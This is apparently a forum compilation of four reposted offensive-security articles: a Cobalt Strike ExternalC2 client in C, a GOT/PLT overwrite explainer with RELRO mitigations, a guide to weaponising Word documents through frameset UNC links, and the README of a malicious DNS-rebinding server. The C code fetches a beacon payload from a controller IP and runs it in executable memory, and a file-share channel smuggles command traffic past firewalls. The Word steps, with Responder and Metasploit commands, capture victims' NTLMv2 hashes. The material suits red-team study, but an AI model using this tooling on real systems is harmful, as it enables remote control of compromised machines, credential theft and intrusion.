To make things a bit easier, we will use win32 and C for this, giving us access to the Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller: // Creates a new C2 controller connection for relaying commands SOCKET createC2Socket(const char *addr, WORD port) { WSADATA wsd; SOCKET sd; SOCKADDR_IN sin; WSAStartup(0x0202, &wsd); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.S_un.S_addr = inet_addr(addr); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sd, (SOCKADDR*)&sin, sizeof(sin)); return sd; } Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving: // Receives data from our C2 controller to be relayed to the injected beacon char *recvData(SOCKET sd, DWORD *len) { char *buffer; DWORD bytesReceived = 0, totalLen = 0; *len = 0; recv(sd, (char *)len, 4, 0); buffer = (char *)malloc(*len); if (buffer == NULL) return NULL; while (totalLen < *len) { bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0); totalLen += bytesReceived; } return buffer; } Similarly, we need a way to return data over our C2 channel to the Controller: // Sends data to our C2 controller received from our injected beacon void sendData(SOCKET sd, const char *data, DWORD len) { char *buffer = (char *)malloc(len + 4); if (buffer == NULL) return; DWORD bytesWritten = 0, totalLen = 0; *(DWORD *)buffer = len; memcpy(buffer + 4, data, len); while (totalLen < len + 4) { bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0); totalLen += bytesWritten; } free(buffer); } Now that we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload. 
This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. 
Transfer C2 over file Let’s recap on what it is we control when attempting to create a custom C2 protocol: From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this? By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon. Let’s think about just how this will look: Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do, however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon. I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITE options are provided. 
This will allow both sides of the Third-Party Client to read and write to the file simultaneously: HANDLE openC2FileServer(const char *filepath) { HANDLE handle; handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (handle == INVALID_HANDLE_VALUE) printf("Error opening file: %x\n", GetLastError()); return handle; } Next, we need a way to serialise our C2 data into the file, as well as indicating which of the two clients should be processing data at any time. To do this, a simple header can be used, for example: struct file_c2_header { DWORD id; DWORD len; }; The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this: void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) { char *fileBytes = NULL; DWORD bytesWritten = 0; fileBytes = (char *)malloc(8 + len); if (fileBytes == NULL) return; // Add our file header *(DWORD *)fileBytes = id; *(DWORD *)(fileBytes+4) = len; memcpy(fileBytes + 8, data, len); // Make sure we are at the beginning of the file SetFilePointer(c2File, 0, 0, FILE_BEGIN); // Write our C2 data in WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL); printf("[*] Wrote %d bytes\n", bytesWritten); } char *readC2File(HANDLE c2File, DWORD *len, int expect) { char header[8]; DWORD bytesRead = 0; char *fileBytes = NULL; memset(header, 0xFF, sizeof(header)); // Poll until we have our expected id in the header while (*(DWORD *)header != expect) { SetFilePointer(c2File, 0, 0, FILE_BEGIN); ReadFile(c2File, header, 8, &bytesRead, NULL); Sleep(100); } // Read out the expected length from the header *len = *(DWORD *)(header + 4); fileBytes = (char *)malloc(*len); if (fileBytes == NULL) return NULL; // Finally, read out our C2 data ReadFile(c2File, fileBytes, *len, &bytesRead, 
NULL); printf("[*] Read %d bytes\n", bytesRead); return fileBytes; } Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action: If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2. Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
-
GOT and PLT for pwning. 19 Mar 2017 in Security Tags: Pwning, Linux So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others). All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.) High-Level Introduction So what is all of this nonsense about? Well, there are two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there are some problems with that strategy: each time the library changes, the addresses of the functions within the library change; when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update. 
Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible. Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. Relocations Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice. .got This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols. .plt This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.) .got.plt This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section. .plt.got It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.) 
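These sections are easy to enumerate yourself rather than trusting readelf. The following is a minimal sketch of mine that walks the ELF64 section header table directly (little-endian 64-bit binaries only, no error handling; the offsets come from the standard ELF64 header layout):

```python
import struct

def elf_section_names(path):
    """List section names by parsing the ELF64 section header table directly."""
    with open(path, "rb") as f:
        data = f.read()
    assert data[:4] == b"\x7fELF" and data[4] == 2  # magic + 64-bit class only
    (e_shoff,) = struct.unpack_from("<Q", data, 0x28)
    e_shentsize, e_shnum, e_shstrndx = struct.unpack_from("<HHH", data, 0x3A)

    def header(i):  # returns (sh_name, sh_offset) of section i
        base = e_shoff + i * e_shentsize
        (sh_name,) = struct.unpack_from("<I", data, base)
        (sh_offset,) = struct.unpack_from("<Q", data, base + 0x18)
        return sh_name, sh_offset

    # Section names live in the string table section indexed by e_shstrndx
    _, strtab = header(e_shstrndx)
    names = []
    for i in range(e_shnum):
        sh_name, _ = header(i)
        end = data.index(b"\x00", strtab + sh_name)
        names.append(data[strtab + sh_name:end].decode())
    return names

print(elf_section_names("/bin/sh"))
```

Which of the .got/.plt variants show up depends on how the binary was linked, which is exactly the point the RELRO discussion below makes.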
TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses. Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions: puts and exit and show the state of the various sections as we go along. Here’s our source: // Build with: gcc -m32 -no-pie -g -o plt plt.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { puts("Hello world!"); exit(0); } Let’s examine the section headers: There are 36 section headers, starting at offset 0x1fb4: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 I’ve left only the sections I’ll be talking about, the full program is 36 sections! So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.) 
We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step: pwndbg> disass main Dump of assembler code for function main: 0x0804843b <+0>: lea ecx,[esp+0x4] 0x0804843f <+4>: and esp,0xfffffff0 0x08048442 <+7>: push DWORD PTR [ecx-0x4] 0x08048445 <+10>: push ebp 0x08048446 <+11>: mov ebp,esp 0x08048448 <+13>: push ebx 0x08048449 <+14>: push ecx 0x0804844a <+15>: call 0x8048370 <__x86.get_pc_thunk.bx> 0x0804844f <+20>: add ebx,0x1bb1 0x08048455 <+26>: sub esp,0xc 0x08048458 <+29>: lea eax,[ebx-0x1b00] 0x0804845e <+35>: push eax 0x0804845f <+36>: call 0x8048300 <puts@plt> 0x08048464 <+41>: add esp,0x10 0x08048467 <+44>: sub esp,0xc 0x0804846a <+47>: push 0x0 0x0804846c <+49>: call 0x8048310 <exit@plt> End of assembler dump. pwndbg> break *0x0804845f Breakpoint 1 at 0x804845f: file plt.c, line 7. pwndbg> r Breakpoint *0x0804845f pwndbg> x/i $pc => 0x804845f <main+36>: call 0x8048300 <puts@plt> Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .plt section, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function. pwndbg> si pwndbg> x/i $pc => 0x8048300 <puts@plt>: jmp DWORD PTR ds:0x804a00c We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to the resulting address. Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above. pwndbg> x/wx 0x804a00c 0x804a00c: 0x08048306 pwndbg> si 0x08048306 in puts@plt () pwndbg> x/2i $pc => 0x8048306 <puts@plt+6>: push 0x0 0x804830b <puts@plt+11>: jmp 0x80482f0 Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred? 
Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then calls the routine to look up the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out. pwndbg> si pwndbg> si pwndbg> x/2i $pc => 0x80482f0: push DWORD PTR ds:0x804a004 0x80482f6: jmp DWORD PTR ds:0x804a008 Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on. pwndbg> x/2wx 0x804a004 0x804a004: 0xf7ffd918 0xf7fedf40 Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the second into the executable area: 0xf7fd9000 0xf7ffb000 r-xp 22000 0 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffc000 0xf7ffd000 r--p 1000 22000 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffd000 0xf7ffe000 rw-p 1000 23000 /lib/i386-linux-gnu/ld-2.24.so Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary. So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol. pwndbg> x/i $pc => 0xf7fedf5b: ret 0xc pwndbg> ni pwndbg> info symbol $pc puts in section .text of /lib/i386-linux-gnu/libc.so.6 Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point: pwndbg> x/4wx $esp 0xffffcc2c: 0x08048464 0x08048500 0xffffccf4 0xffffccfc pwndbg> x/s *(int *)($esp+4) 0x8048500: "Hello world!" Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts. 
Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first: pwndbg> disass 'puts@plt' Dump of assembler code for function puts@plt: 0x08048300 <+0>: jmp DWORD PTR ds:0x804a00c 0x08048306 <+6>: push 0x0 0x0804830b <+11>: jmp 0x80482f0 End of assembler dump. pwndbg> x/wx 0x804a00c 0x804a00c: 0xf7e4b870 pwndbg> info symbol 0xf7e4b870 puts in section .text of /lib/i386-linux-gnu/libc.so.6 So now, a call to puts@plt results in an immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.) How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT. Pwning Relocations Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled. 
So we won’t be overwriting any executable sections, but we should be used to that. On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry. Mitigations So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO. Partial RELRO (enabled with -Wl,-z,relro): Maps the .got section as read-only (but not .got.plt) Rearranges sections to reduce the likelihood of global variables overflowing into control structures. Full RELRO (enabled with -Wl,-z,relro,-z,now): Does the steps of Partial RELRO, plus: Causes the linker to resolve all symbols at link time (before starting execution) and then remove write permissions from .got. .got.plt is merged into .got with full RELRO, so you won’t see this section name. Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable. Summary The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT. 
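Whether a binary has any RELRO at all shows up in the ELF itself, so checking doesn't require checksec. The sketch below is my own (ELF64 little-endian only) and looks for the PT_GNU_RELRO program header that -z relro adds; detecting *full* RELRO would additionally mean looking for the BIND_NOW flag in the dynamic section, which is omitted here for brevity:

```python
import struct

PT_GNU_RELRO = 0x6474E552  # program header type added by -z relro

def has_relro_segment(path):
    """True if the binary carries a PT_GNU_RELRO program header (ELF64 only)."""
    with open(path, "rb") as f:
        data = f.read()
    assert data[:4] == b"\x7fELF" and data[4] == 2  # magic + 64-bit class only
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        (p_type,) = struct.unpack_from("<I", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            return True
    return False

print(has_relro_segment("/bin/sh"))  # True on most modern distro builds
```

If the segment is missing entirely, the whole GOT stays writable for the life of the process, which is the situation the overwrite technique above relies on.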
References
- ELF Format Reference
- Examining Dynamic Linking with GDB
- RELRO - A (not so well known) Memory Corruption Mitigation Technique
- What is the symbol and the global offset table?
- How the ELF ruined Christmas

Sursa: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
Microsoft Office – NTLM Hashes via Frameset

December 18, 2017

Microsoft Office documents play a vital role in red team assessments, as they are usually used to gain some initial foothold on the client's internal network. Staying under the radar is a key element as well, and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft Office. Historically, Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combine this with Responder in order to capture NTLM hashes externally.

Word documents with the docx extension are actually zip files which contain various XML documents. These XML files control the theme, the fonts, the settings of the document, and the web settings. Using 7-Zip it is possible to open that archive in order to examine these files:

Docx Contents

The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset.

webSettings File

Adding the following code will create a link with another file.

<w:frameset>
  <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
  </w:framesetSplitbar>
  <w:frameset>
    <w:frame>
      <w:name w:val="3"/>
      <w:sourceFileName r:id="rId1"/>
      <w:linkedToFile/>
    </w:frame>
  </w:frameset>
</w:frameset>

webSettings XML – Frameset

The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten.

webSettings with Frameset – Adding new version to archive

A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1), the UNC path, and the TargetMode specifying whether it is external or internal.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

webSettings XML Relationship File – Contents

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

webSettings XML rels

Now that the Word document has been weaponized to connect to a UNC path over the Internet, Responder can be configured in order to capture the NTLM hashes.

responder -I wlan0 -e 192.168.1.169 -b -A -v

Responder Configuration

Once the target user opens the Word document it will try to connect to a UNC path.

Word – Connect to UNC Path via Frameset

Responder will retrieve the NTLMv2 hash of the user.

Responder – NTLMv2 Hash via Frameset

Alternatively, Metasploit Framework can be used instead of Responder in order to capture the password hash.

auxiliary/server/capture/smb

Metasploit – SMB Capture Module

NTLMv2 hashes will be captured in Metasploit upon opening the document.

Metasploit SMB Capture Module – NTLMv2 Hash via Frameset

Conclusion

This technique can allow the red team to grab domain password hashes from users, which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally, if the target user is an elevated account such as local administrator or domain admin, then this method can be combined with SMB relay in order to obtain a Meterpreter session.

Sursa: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
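The repackaging steps described in this post (splice the frameset into word/webSettings.xml, then drop word/_rels/webSettings.xml.rels next to it) are easy to script. Below is a rough sketch using Python's zipfile module; the UNC target is the same placeholder address used above, and inject_frameset is my own helper name, not part of any tool:

```python
import io
import zipfile

# placeholder attacker-controlled SMB share, as in the example above
UNC_TARGET = r"\\192.168.1.169\Microsoft_Office_Updates.docx"

FRAMESET = ('<w:frameset><w:framesetSplitbar><w:w w:val="60"/>'
            '<w:color w:val="auto"/><w:noBorder/></w:framesetSplitbar>'
            '<w:frameset><w:frame><w:name w:val="3"/>'
            '<w:sourceFileName r:id="rId1"/><w:linkedToFile/>'
            '</w:frame></w:frameset></w:frameset>')

RELS = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/'
        'package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/frame" '
        'Target="%s" TargetMode="External"/></Relationships>') % UNC_TARGET

def inject_frameset(docx_bytes):
    """Return a copy of the .docx with the frameset spliced into
    word/webSettings.xml and the rId1 relationship file added."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zin, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for name in zin.namelist():
            data = zin.read(name)
            if name == "word/webSettings.xml":
                # splice the frameset in just before the closing tag
                data = data.replace(
                    b"</w:webSettings>",
                    FRAMESET.encode() + b"</w:webSettings>")
            zout.writestr(name, data)
        # relationship file resolving rId1 to the external UNC path
        zout.writestr("word/_rels/webSettings.xml.rels", RELS)
    return out.getvalue()

# demo on a stub document (a real .docx has many more entries)
stub = io.BytesIO()
with zipfile.ZipFile(stub, "w") as z:
    z.writestr("word/webSettings.xml", "<w:webSettings></w:webSettings>")
weaponized = inject_frameset(stub.getvalue())
with zipfile.ZipFile(io.BytesIO(weaponized)) as z:
    names = z.namelist()
    settings = z.read("word/webSettings.xml")
print(names)
```

A real document already contains many more archive entries (content types, themes, fonts); the function simply copies them through untouched.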
Whonow DNS Server

A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves.

# respond to DNS queries for this domain with 52.23.194.42 the first time
# it is requested and then 192.168.1.1 every time after that
A.52.23.194.42.1time.192.168.1.1.forever.rebind.network

# respond first with 52.23.194.42, then 192.168.1.1 the next five times,
# and then start all over again (1, then 5, forever...)
A.52.23.194.42.1time.192.168.1.1.5times.repeat.rebind.network

What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's Same-origin policy. Instead, everyone can share the same public whonow server.

Note: You should include UUIDs (e.g. a06a5856-1fff-4415-9aa2-823230b05826) as a subdomain in each DNS lookup to a whonow server. These have been omitted from examples in this README for brevity, but assume requests to *.rebind.network should be *.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network. See the Gotchas section for more info as to why.

Subdomains = Rebind Rules

The beauty of whonow is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords: A, (n)times, forever, and repeat, you can define complex and powerful DNS behavior.

Anatomy of a whonow request

A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com

- A: The type of DNS request. Currently only A records are supported, but AAAA should be coming soon.
- <ip-address>: an IPv4 address (IPv6 coming soon) with each octet separated by a period (e.g. 192.168.1.1).
- <rule>: One of three rules:
  - (n)time: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. 1time, 3times, 5000times)
  - forever: Respond with the previous IP address forever.
  - repeat: Repeat the entire set of rules starting from the beginning.
- [uuid/random-string]: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See Gotchas for more info.
- example.com: A domain name you have pointing to a whonow nameserver, like the publicly available rebind.network whonow instance.

Rules can be chained together to form complex response behavior.

Examples

# always respond with 192.168.1.1. This isn't really DNS rebinding
# but it still works
A.192.168.1.1.forever.rebind.network

# alternate between localhost and 10.0.0.1 forever
A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network

# first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever.
A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network

# respond with 52.23.194.42 the first time, then whatever `whonow --default-address`
# is set to forever after that (default: 127.0.0.1)
A.52.23.194.42.1time.rebind.network

Limitations

"Each label [subdomain] may contain zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation." (from the DNS Wikipedia page) Additionally, there may not be more than 127 labels/subdomains.

Gotchas

Use Unique Domain Names

Each unique domain name request to whonow creates a small state-saving program in the server's RAM. The next time that domain name is requested the program counter increments and the state may be mutated. All unique domain names are their own unique program instances. To avoid clashing with other users or having your domain name program's state inadvertently incremented, you should add a UUID subdomain after your rule definitions. That UUID should never be reused.
# this
A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network
# not this
A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network

--max-ram-domains

The program state associated with each unique domain name is stored by whonow in RAM. To avoid running out of RAM, an upper bound is placed on the number of unique domains whose program state can be managed at the same time. By default, this value is set to 10,000,000, but it can be configured with --max-ram-domains. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO).

Running your own whonow server

To run your own whonow server in the cloud, use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install whonow on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet.

# install
npm install --cli -g whonow@latest
# run it!
whonow --port 53

If that ☝ is too much trouble, feel free to just use the public whonow server running on rebind.network 🌐.

Usage

$ whonow --help
usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS]

A malicious DNS server for executing DNS Rebinding attacks on the fly.

Optional arguments:
  -h, --help            Show this help message and exit.
  -v, --version         Show program's version number and exit.
  -p PORT, --port PORT  What port to run the DNS server on (default: 53).
  -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER
                        The default IP address to respond with if no rule is
                        found (default: "127.0.0.1").
  -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS
                        The number of domain name records to store in RAM at
                        once. Once the number of unique domain names queried
                        surpasses this number, domains will be removed from
                        memory in the order they were requested. Domains that
                        have been removed in this way will have their program
                        state reset the next time they are queried
                        (default: 10000000).
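To make the rule grammar concrete, here is a rough Python reimplementation of the per-domain answer program described above. whonow itself is written in JavaScript; this sketch only illustrates the semantics, and the class and method names are my own:

```python
import re

class RebindRule:
    """Toy model of whonow's per-domain answer program. `labels` is the
    rule portion of the queried name (octets are individual DNS labels);
    parsing stops at the first label that is not part of a rule, e.g. a
    trailing UUID or the base domain."""

    def __init__(self, labels):
        assert labels[0] == "A", "only A records in this sketch"
        self.steps = []     # [ip, remaining]; remaining=None means 'forever'
        self.repeat = False
        i = 1
        while i < len(labels):
            if labels[i] == "repeat":
                self.repeat = True
                break
            if i + 4 >= len(labels):
                break       # not enough labels left for "<4 octets>.<rule>"
            ip = ".".join(labels[i:i + 4])
            rule = labels[i + 4]
            if rule == "forever":
                self.steps.append([ip, None])
            else:
                m = re.fullmatch(r"(\d+)times?", rule)
                if not m:
                    break   # trailing uuid / base domain reached
                self.steps.append([ip, int(m.group(1))])
            i += 5
        self.pos = 0
        self.initial = [list(s) for s in self.steps]

    def query(self, default="127.0.0.1"):
        """Return the next answer, advancing the program state."""
        while self.pos < len(self.steps):
            ip, left = self.steps[self.pos]
            if left is None:
                return ip                       # 'forever': stick here
            if left > 0:
                self.steps[self.pos][1] -= 1
                return ip
            self.pos += 1                       # step exhausted, move on
        if self.repeat:                         # rewind the whole program
            self.steps = [list(s) for s in self.initial]
            self.pos = 0
            return self.query(default)
        return default                          # like --default-answer

# alternate between localhost and 10.0.0.1 forever
r = RebindRule("A.127.0.0.1.1time.10.0.0.1.1time.repeat".split("."))
answers = [r.query() for _ in range(4)]

# one answer, then fall back to the default address (cf. --default-answer)
r2 = RebindRule("A.52.23.194.42.1time.rebind.network".split("."))
fallback = [r2.query() for _ in range(2)]
print(answers, fallback)
```

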